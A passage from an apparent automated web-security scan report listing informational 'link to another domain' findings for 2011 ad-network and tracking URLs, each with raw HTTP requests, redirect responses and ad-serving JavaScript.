<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=f@f&url=https%3a%2f%2fsecure.newcastlepermanent.com.au%2fonlineforms%2fhomeloan%2fCampaignRedirect.aspx%3fCampaignCode%3dInfochoiceHomeLoans&PUB=809&BT=15&PRD=2433&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/npb1-172unqa.jpg?x=65&y=50&q=90&sig=HZYEyeNvzl8k9mabY9.AKQ--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=h@f&url=http%3a%2f%2fwww.bankmecu.com.au%2fborrowing%2fhome-loans%2fgogreen-home-loan.html%3f%26utm_source%3dInfochoice%26utm_medium%3dcomparisonsite%26utm_content%3dgoGreen-home-loan%26utm_campaign%3dhomeloan&PUB=809&BT=15&PRD=2357&LOC=-1&LOCE=Ws.LinkOuts"><span class="img">
...[SNIP]...
<div class="ft"><a target="_blank" href="http://yahoo.infochoice.com.au/home-loans/home-loan-interest-rates.aspx">COMPARE MORE</a>
...[SNIP]...
<li class="first"><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=e@ej&url=http%3a%2f%2fad.au.doubleclick.net%2fclk%3b243134912%3b66834333%3be&PUB=809&BT=15&PRD=1519&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/cua-172unqb.jpg?x=65&y=50&q=90&sig=Y6AosooW32eF4AFgBhhXOQ--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=a&url=http%3a%2f%2fwww.citibank.com.au%2fcardsoffer%2fCardsOnline%2flending%2f0110personalcredit.htm%3fCode%3dV1R3BHK3&PUB=809&BT=15&PRD=18433&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/citibank_logo_103x93-172unpv.gif?x=65&y=50&q=90&sig=Z0B4fAvcmWSNVEyaghguvg--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=e&url=http%3a%2f%2fad.au.doubleclick.net%2fclk%3b233006557%3b55110142%3bp&PUB=809&BT=15&PRD=13378&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/aussie_rgb_stacked_103_w-172unpu.jpg?x=65&y=50&q=90&sig=OQ3lTaKT4RX0TmkdjQ3ADw--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=e&url=http%3a%2f%2fad.au.doubleclick.net%2fclk%3b233006557%3b55110142%3bp&PUB=809&BT=15&PRD=13349&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/aussie_rgb_stacked_103_w-172unpu.jpg?x=65&y=50&q=90&sig=OQ3lTaKT4RX0TmkdjQ3ADw--"></span>
...[SNIP]...
<div class="ft"><a target="_blank" href="http://yahoo.infochoice.com.au/personal-loans/list.aspx">COMPARE MORE</a>
...[SNIP]...
</div>
<script type="text/javascript" src="http://l.yimg.com/ao/i/mp/js/loader/yuiloader.s1270.js"></script>
...[SNIP]...

14.26. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=9675309

The response contains the following link to another domain:

http://w55c.net/m.gif?id=8bb138bc0446417c9a4df9a0136d0caf8a93328592bf4d059bfc856c256fbc33&ei=GOOGLE&euid=E1

Request

GET /pixel?nid=9675309 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://w55c.net/m.gif?id=8bb138bc0446417c9a4df9a0136d0caf8a93328592bf4d059bfc856c256fbc33&ei=GOOGLE&euid=E1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:54 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 312
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://w55c.net/m.gif?id=8bb138bc0446417c9a4df9a0136d0caf8a93328592bf4d059bfc856c256fbc33&ei=GOOGLE&euid=E1">here</A>
...[SNIP]...

14.27. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=invitemedia

The response contains the following link to another domain:

http://g-pixel.invitemedia.com/gmatcher?id=E1

Request

GET /pixel?nid=invitemedia HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:14 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 242
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1">here</A>
...[SNIP]...

14.28. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?google_nid=rubicon&google_cm&google_sc

The response contains the following link to another domain:

http://pixel.rubiconproject.com/tap.php?v=7751&nid=2249&expires=30&google_error=1

Request

GET /pixel?google_nid=rubicon&google_cm&google_sc HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://pixel.rubiconproject.com/tap.php?v=7751&nid=2249&expires=30&google_error=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:27 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 290
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pixel.rubiconproject.com/tap.php?v=7751&nid=2249&expires=30&google_error=1">here</A>
...[SNIP]...

14.29. http://cms.ad.yieldmanager.net/v1/cms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cms.ad.yieldmanager.net
Path:	/v1/cms

Issue detail

The page was loaded from a URL containing a query string:

http://cms.ad.yieldmanager.net/v1/cms?esig=1~d1b7a0970db7c0b314d942e728461f2b03f1f713&nwid=10000343293&sigv=1

The response contains the following link to another domain:

http://i.w55c.net/m_yahoo.gif?xid=ubi_mxMoC3tX768OUEdNOoo8

Request

GET /v1/cms?esig=1~d1b7a0970db7c0b314d942e728461f2b03f1f713&nwid=10000343293&sigv=1 HTTP/1.1
Host: cms.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii&t=247; XO=y=1&t=247&v=3&yoo=1&nwid1=20072115599&XTS=1315399569&XSIG=ClmDn5YsAzlOqtgfUEzP6VCUNIc-

Response

HTTP/1.1 302 Found
Date: Wed, 07 Sep 2011 14:15:54 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://i.w55c.net/m_yahoo.gif?xid=ubi_mxMoC3tX768OUEdNOoo8
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 758

HTTP/1.1 302 Found
Date: Wed, 07 Sep 2011 14:15:54 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PU
...[SNIP]...
ion: http://i.w55c.net/m_yahoo.gif?xid=ubi_mxMoC3tX768OUEdNOoo8
Cache-Control: private
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

The document has moved <A HREF="http://i.w55c.net/m_yahoo.gif?xid=ubi_mxMoC3tX768OUEdNOoo8">here</A>
...[SNIP]...

14.30. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D87d61576-d3f9-47f1-8369-106b64f87924&mpt=87d61576-d3f9-47f1-8369-106b64f87924&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsKxUAMA68SXGdhvfb6k.M8wlbhdalC7h650gxIekiEji1jmOwbyYCECEcZQyj8NJ5u7ZSVTX1xC7Fs3O1nusJzKNW0yj5H97L6SeREapcAKvB_XxfQgIzqtPcDm40aPw--%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsKxUAMA68SXGdhvfb6k.M8wlbhdalC7h650gxIekiEji1jmOwbyYCECEcZQyj8NJ5u7ZSVTX1xC7Fs3O1nusJzKNW0yj5H97L6SeREapcAKvB_XxfQgIzqtPcDm40aPw--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=87d61576-d3f9-47f1-8369-106b64f87924

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D87d61576-d3f9-47f1-8369-106b64f87924&mpt=87d61576-d3f9-47f1-8369-106b64f87924&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsKxUAMA68SXGdhvfb6k.M8wlbhdalC7h650gxIekiEji1jmOwbyYCECEcZQyj8NJ5u7ZSVTX1xC7Fs3O1nusJzKNW0yj5H97L6SeREapcAKvB_XxfQgIzqtPcDm40aPw--%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html?cb=0.39881858555600047&keyword=smh/business_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:38 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5268
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsKxUAMA68SXGdhvfb6k.M8wlbhdalC7h650gxIekiEji1jmOwbyYCECEcZQyj8NJ5u7ZSVTX1xC7Fs3O1nusJzKNW0yj5H97L6SeREapcAKvB_XxfQgIzqtPcDm40aPw--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=87d61576-d3f9-47f1-8369-106b64f87924" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.jpg" width="300" height="250" border="0" alt="">
...[SNIP]...

14.31. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b&mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b&mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:18 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5268
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.jpg" width="300" height="250" border="0" alt="">
...[SNIP]...

14.32. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0b3552c4-a197-4a3a-a992-e36aed8290ac&mpt=0b3552c4-a197-4a3a-a992-e36aed8290ac&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDkOxDAMA78SqI4BW7RsKb9Rji5IlyrYv69UcQYg.RFA22LKA.tC4BAFmqa1EKo7RPjoxZvN0h1e3IzLheHXqWzVD8pplqdwnWn5Y5ES2Ss0sAc.730HjsAWVRm_P9vqGzE-%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDkOxDAMA78SqI4BW7RsKb9Rji5IlyrYv69UcQYg.RFA22LKA.tC4BAFmqa1EKo7RPjoxZvN0h1e3IzLheHXqWzVD8pplqdwnWn5Y5ES2Ss0sAc.730HjsAWVRm_P9vqGzE-&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=0b3552c4-a197-4a3a-a992-e36aed8290ac

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0b3552c4-a197-4a3a-a992-e36aed8290ac&mpt=0b3552c4-a197-4a3a-a992-e36aed8290ac&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDkOxDAMA78SqI4BW7RsKb9Rji5IlyrYv69UcQYg.RFA22LKA.tC4BAFmqa1EKo7RPjoxZvN0h1e3IzLheHXqWzVD8pplqdwnWn5Y5ES2Ss0sAc.730HjsAWVRm_P9vqGzE-%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:58 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5268
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDkOxDAMA78SqI4BW7RsKb9Rji5IlyrYv69UcQYg.RFA22LKA.tC4BAFmqa1EKo7RPjoxZvN0h1e3IzLheHXqWzVD8pplqdwnWn5Y5ES2Ss0sAc.730HjsAWVRm_P9vqGzE-&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=0b3552c4-a197-4a3a-a992-e36aed8290ac" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.jpg" width="300" height="250" border="0" alt="">
...[SNIP]...

14.33. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D289964c1-9952-4080-b8b0-e08ffc0134c4&mpt=289964c1-9952-4080-b8b0-e08ffc0134c4&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOhUAMA6.CUrNSfrskHIfVo0Kvo0LcHafyjGT7ITPalwwdti5kCgkziTKBkEbm8Ckts2tzDm5HHNx.HOc5WcynU02rvHXlrax.EtmRzhZAB_7v6wIOoKDax_sBpXkagA--%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOhUAMA6.CUrNSfrskHIfVo0Kvo0LcHafyjGT7ITPalwwdti5kCgkziTKBkEbm8Ckts2tzDm5HHNx.HOc5WcynU02rvHXlrax.EtmRzhZAB_7v6wIOoKDax_sBpXkagA--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=289964c1-9952-4080-b8b0-e08ffc0134c4

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D289964c1-9952-4080-b8b0-e08ffc0134c4&mpt=289964c1-9952-4080-b8b0-e08ffc0134c4&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOhUAMA6.CUrNSfrskHIfVo0Kvo0LcHafyjGT7ITPalwwdti5kCgkziTKBkEbm8Ckts2tzDm5HHNx.HOc5WcynU02rvHXlrax.EtmRzhZAB_7v6wIOoKDax_sBpXkagA--%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html?cb=0.3839801487047225&keyword=smh/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:32 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5268
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOhUAMA6.CUrNSfrskHIfVo0Kvo0LcHafyjGT7ITPalwwdti5kCgkziTKBkEbm8Ckts2tzDm5HHNx.HOc5WcynU02rvHXlrax.EtmRzhZAB_7v6wIOoKDax_sBpXkagA--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=289964c1-9952-4080-b8b0-e08ffc0134c4" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.jpg" width="300" height="250" border="0" alt="">
...[SNIP]...

14.34. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D38838003-8d0c-46bf-8cdb-8cb1a0f4dda1&mpt=38838003-8d0c-46bf-8cdb-8cb1a0f4dda1&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlMpqdsS.A2lYkJsTIi_4yzxnWTnFUC2afXcME.CTHHAPMwoAne4KpIPPVJp_Ux.jM7TbdezjLGbxDTKS826hMWflVmZReHEQryf6yI2orFa2_cD8T4bkA--%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOgDAMA7.CMlMpqdsS.A2lYkJsTIi_4yzxnWTnFUC2afXcME.CTHHAPMwoAne4KpIPPVJp_Ux.jM7TbdezjLGbxDTKS826hMWflVmZReHEQryf6yI2orFa2_cD8T4bkA--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=38838003-8d0c-46bf-8cdb-8cb1a0f4dda1

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D38838003-8d0c-46bf-8cdb-8cb1a0f4dda1&mpt=38838003-8d0c-46bf-8cdb-8cb1a0f4dda1&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlMpqdsS.A2lYkJsTIi_4yzxnWTnFUC2afXcME.CTHHAPMwoAne4KpIPPVJp_Ux.jM7TbdezjLGbxDTKS826hMWflVmZReHEQryf6yI2orFa2_cD8T4bkA--%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/article/2011/09/07/258681_ntnews.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:26 GMT
